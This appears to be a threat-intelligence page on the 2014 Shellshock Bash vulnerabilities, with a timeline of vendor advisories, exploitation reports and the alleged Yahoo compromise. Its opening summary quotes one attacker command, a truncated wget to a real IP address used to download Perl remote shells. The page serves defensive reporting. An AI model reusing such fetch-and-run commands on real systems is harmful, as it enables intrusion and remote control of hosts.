The Shellshock family of Bash vulnerabilities, led by CVE-2014-6271, was exploited within hours of disclosure to remotely execute commands on exposed Unix, Linux, and some OS X systems. Security firms and media reports documented thousands of attacks, automated Internet-wide scanning, and malware delivery through CGI and other Bash-dependent services, with observed payloads including reverse shells, backdoors, IRC bots, DDoS tools such as Tsunami/Kaiten and ShellBot variants, and downloaders that pulled additional code from attacker-controlled servers. Researchers warned that public proof-of-concept code and Metasploit support made exploitation trivial, while additional attack paths involving DHCP, SSH ForceCommand, mail-processing components, embedded devices, and some ICS/SCADA environments expanded the potential blast radius well beyond web servers.
Organizations rushed to patch, but the response was complicated by the discovery that the initial Bash fix was incomplete, prompting follow-on patches for CVE-2014-7169 and other related flaws. Reports also tied Shellshock exploitation to compromises at high-profile targets, including allegations that attackers gained access to Yahoo servers and used commands such as:
wget http://89.248.172.139/...
to deploy Perl-based remote shells while probing for lateral movement opportunities. Vendors including Red Hat, Canonical, SUSE, Apple, and others issued updated fixes as defenders were urged to inventory exposed assets, deploy IPS protections, and remediate vulnerable Internet-facing and hard-to-update systems quickly.

See which actors are running it and whether you're in range.
35 events from the most recent confirmed update back to the earliest known activity.
HP published security bulletin HPSBMU03220 rev.1 stating that HP Shunra Network Appliance and HP Shunra Wildcat Appliance version 8.0 were affected by multiple Shellshock-related Bash vulnerabilities that could allow remote code execution. HP released software updates and urged customers to apply them promptly.
HP published security bulletin HPSBMU03236 rev.1 warning that HP Systems Insight Manager for Windows versions 7.2.2, 7.3.2, and 7.4 were affected by Shellshock-related Bash vulnerabilities, including CVE-2014-6277, CVE-2014-7186, and CVE-2014-7187, that could allow remote code execution. HP released hot fixes for the affected versions and urged customers to apply them promptly.
HP published security bulletin HPSBMU03246 rev.1 warning that HP Insight Control for Linux Central Management Server Pre-boot Execution Environment was affected by multiple Bash vulnerabilities, including CVE-2014-6271, CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, and CVE-2014-7196. HP provided a manual remediation procedure to update the Bash binary and supporting libraries in the pre-boot toolkit using patched Red Hat Enterprise Linux 6.2 packages.
HP published security bulletin HPSBMU03245 rev.1 warning that HP Insight Control server deployment Linux Preboot Execution Environment was affected by multiple Bash vulnerabilities, including CVE-2014-6271, CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, and CVE-2014-7187. As mitigation, HP instructed customers to remove the x86 Linux Preboot Execution Environment from HP Insight Control Server Deployment using the PXE Configuration Utility.
HP published security bulletin HPSBMU03217 rev.1 warning that HP Vertica Analytics Platform AMIs and virtual machines before version 7.1.1-0 contained a Bash shell vulnerable to multiple Shellshock CVEs that could allow remote code execution. HP advised customers to upgrade to Vertica 7.1.1-0 or later, install updated Bash packages, or use the latest VM and Amazon AMI images.
HP published security bulletin HPSBMU03182 rev.1 warning that HP Server Automation versions 9.10 through 10.10 were affected by multiple Shellshock-related Bash vulnerabilities, including CVE-2014-6271, CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, and CVE-2014-7187. HP said successful exploitation could lead to remote code execution and directed customers to remediation guidance and relevant third-party patches.
HP published security bulletin HPSBST03155 rev.1 stating that all HP StoreFabric H-series switches running Bash were affected by multiple Shellshock-related vulnerabilities that could enable remote code execution. HP said it was working on a firmware update and, pending a fix, advised mitigations including firewalling the switches, changing default passwords, reviewing account access, and disabling the QuickTools web GUI.
HP published security bulletin HPSBMU03165 rev.1 warning that HP Propel v1.00 was affected by multiple Shellshock-related Bash vulnerabilities that could enable remote code execution. HP urged customers to act quickly and provided remediation guidance through a support document.
JVN iPedia published an advisory stating that QNAP QTS 4.1.1 Build 0927 and earlier were affected by Shellshock-related GNU Bash flaws that could let a remote, unauthenticated attacker execute arbitrary commands with the privileges of the calling application. The notice said QNAP Turbo NAS users should update to the latest firmware and noted coordinated disclosure involving IPA and JPCERT/CC.
By October, better Bash patches were made available as vendors and maintainers continued addressing shortcomings in the original Shellshock fixes and related vulnerabilities. The patch timeline expanded beyond CVE-2014-6271 and CVE-2014-7169 to include additional issues such as CVE-2014-7186.
HP published security bulletin HPSBST03129 rev.1 warning that all HP StoreFabric B-series switches running Bash were affected by multiple Shellshock-related vulnerabilities that could allow remote code execution. HP released fixed Fabric OS versions, said Fabric OS v7.3.0b would be available soon, and recommended mitigations including firewalling the switches, changing default passwords, reviewing account access, and enforcing stronger password policies.
HP published security bulletin HPSBMU03143 rev.1 stating that HP Virtualization Performance Viewer versions 1.0, 1.1, 1.2, 2.0, and 2.01 were affected by multiple Shellshock-related Bash vulnerabilities that could allow remote code execution and privilege escalation through shell scripts. HP provided software update guidance to remediate the issue and urged customers to act promptly.
HP published security bulletin HPSBGN03142 rev.1 stating that HP Business Service Automation Essentials 9.1 and 9.2 were affected by multiple Shellshock-related Bash vulnerabilities that could enable remote code execution and privilege escalation through shell scripts. HP released software updates for the affected versions and urged customers to act on the bulletin promptly.
HP published security bulletin HPSBGN03141 rev.1 stating that HP Automation Insight 1.00 was affected by multiple Shellshock-related Bash vulnerabilities that could allow remote code execution and privilege escalation through shell scripts. HP released software updates to remediate the issue and urged customers to apply them promptly.
HP published security bulletin HPSBMU03144 rev.1 warning that HP Operation Agent Virtual Appliance versions 11.11 through 11.14 were affected by multiple Shellshock-related Bash vulnerabilities that could allow remote code execution and privilege escalation. HP advised customers to apply the provided software update as soon as possible.
HP published security bulletin HPSBHF03125 rev.1 warning that all released HP Next Generation Firewall versions running Bash were affected by Shellshock-related vulnerabilities that could lead to remote code execution. HP said exploitation required valid administrative credentials and released NGFW version 1.1.0.4153 to remediate the issue.
HP published security bulletin HPSBGN03138 rev.1 stating that HP Operations Analytics 2.0 and 2.1 were affected by multiple Shellshock-related Bash vulnerabilities that could allow remote code execution and privilege escalation through shell scripts. HP said software updates were released to remediate the issue.
IBM published a security bulletin stating that all versions of DS8000 Hardware Management Console systems, including DS8870, DS8800, DS8700, DS8100, and DS8300, were affected by six Shellshock-related Bash vulnerabilities. IBM released the CVE_BASH_BUG_PATCH_v1.0 patch through Fix Central and said restricting SSH access could provide partial mitigation, though no complete workaround was known.
IBM published a security bulletin stating that six Shellshock-related Bash vulnerabilities affected IBM Smart Analytics System 7600, 7700, and 7710, including CVE-2014-6271 and CVE-2014-7169. IBM identified affected components such as Power Hardware Management Console and System Storage SAN40B, and directed customers to apply fixes including HMC updates and Brocade FOS 7.2.1c1 upgrades.
IBM published a security bulletin stating that IBM SDN VE components were affected by multiple Shellshock-related Bash vulnerabilities, including CVE-2014-6271 and CVE-2014-7169, exposing some components to remote command execution and others to local code execution or denial of service. IBM said affected Unified Controller and Service Appliance editions up to version 1.2.0 and Dove Management Console VMware Edition 1.0.0 should be upgraded to version 1.2.1 or later, with fixes made available through Passport Advantage.
IBM published a security bulletin stating that six Shellshock-related Bash vulnerabilities affected IBM PureApplication System manager components and deployed Red Hat Linux virtual machines in versions 1.0, 1.1, and 2.0. IBM provided interim fixes for managers and an emergency fix for affected Red Hat Linux virtual machines, and said deployed AIX virtual machines were not affected.
A public write-up by Jonathan D. Hall alleged that attackers gained root access on at least two Yahoo hosts and used wget to deploy a Perl remote shell from attacker-controlled infrastructure. The report also claimed Romanian-language IRC bot activity, lateral movement inside Yahoo's network, and compromise of Lycos systems.
Yahoo responded that it began patching systems after Shellshock was identified on September 24, isolated a small number of affected servers, and found no evidence that user data had been compromised. This was the company's public response to claims that attackers had accessed Yahoo infrastructure.
Security researcher Jonathan Hall said he found Yahoo, Lycos, and WinZip websites vulnerable or compromised through Shellshock and observed attackers exploring Yahoo's network, possibly toward Yahoo Games infrastructure. He said he notified Yahoo, its executives, and the FBI about the activity.
Novell published a knowledge base advisory stating that ZENworks Configuration Management was affected by the GNU Bash remote code execution vulnerability known as Shellshock. The advisory documented product exposure and vendor guidance for remediation or mitigation.
IBM published a security bulletin stating that six Shellshock-related Bash vulnerabilities affected IBM Security Access Manager for Mobile 8.0 and IBM Security Access Manager for Web 7.0 and 8.0. IBM identified affected firmware versions, released patches for all affected versions, and said no workarounds were known.
IBM published a security bulletin stating that six Shellshock-related Bash vulnerabilities affected SAN Volume Controller and Storwize family products, including IBM Flex System V7000, across releases 1.1 through 7.3. IBM advised customers to upgrade to fixed code levels and noted that, in this product context, exploitation required authenticated access.
FireEye reported widespread automated exploitation worldwide, including malware delivery, reverse shells, backdoors, DDoS tooling, reconnaissance, and possible click-fraud activity. It also highlighted attack paths beyond CGI, including DHCP clients and SSH ForceCommand, and warned that embedded and ICS/SCADA systems could be hard to patch.
The initial fix for CVE-2014-6271 was found to be incomplete, prompting disclosure of a related vulnerability tracked as CVE-2014-7169. Vendors rushed to update their patches as researchers warned that remediation was more complicated than first believed.
As patching began, Apple said most default OS X users were not remotely exposed unless they had enabled vulnerable services, while Google said standard Android used Mksh rather than Bash and was not affected by default. Administrators were urged to apply vendor updates and assess exposed devices such as routers and servers.
Within a day of the U.S. Department of Homeland Security's public warning, researchers and security firms recorded widespread exploitation attempts. Incapsula reported 17,400 attacks against more than 1,800 web domains in a 24-hour period as organizations rushed to patch.
Security researchers reported that compromised hosts were being enrolled into IRC-controlled botnets using reused public malware such as Perl bots and modified proof-of-concept code. Some infected machines were already participating in distributed denial-of-service attacks and scanning for additional vulnerable targets.
Researchers observed active exploitation almost immediately after disclosure, with attackers scanning for vulnerable systems and using public proof-of-concept code to run commands remotely. Early campaigns installed malware, reverse shells, and backdoors on exposed Linux and Mac systems.
The Bash vulnerability family later dubbed Shellshock, initially tracked as CVE-2014-6271, was publicly disclosed and shown to allow arbitrary command execution via crafted environment variables. The issue affected many Unix-like systems and exposed internet-facing services such as CGI-based web applications.
Sudo disclosed and fixed CVE-2004-1051, a flaw in environment sanitization that could let users execute arbitrary commands when permitted sudo scripts invoked bash. The advisory highlighted bash's unsafe importing of environment variables beginning with "()", an early precursor to later Shellshock concerns.
Vulnerabilities, threat actors, malware, products, organizations, breaches, and observables Mallory has linked to this story. Indicator values are masked here and available in full in the app.
Indicator values are masked on this page. See the values in Mallory Domains, IPs, hashes, and URLs are exportable to your SIEM.
Correlate live exploitation activity against the software you actually run, and see where you're exposed.
34 references tracked. Mallory keeps watching after this page renders.
novell.com
Open sourcewww-01.ibm.com
Open sourcegithub.com
Open sourcewww-01.ibm.com
Open sourceweb.nvd.nist.gov
Open sourcewired.com
Open sourcetheregister.co.uk
Open sourcesudo.ws
Open sourceMap indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.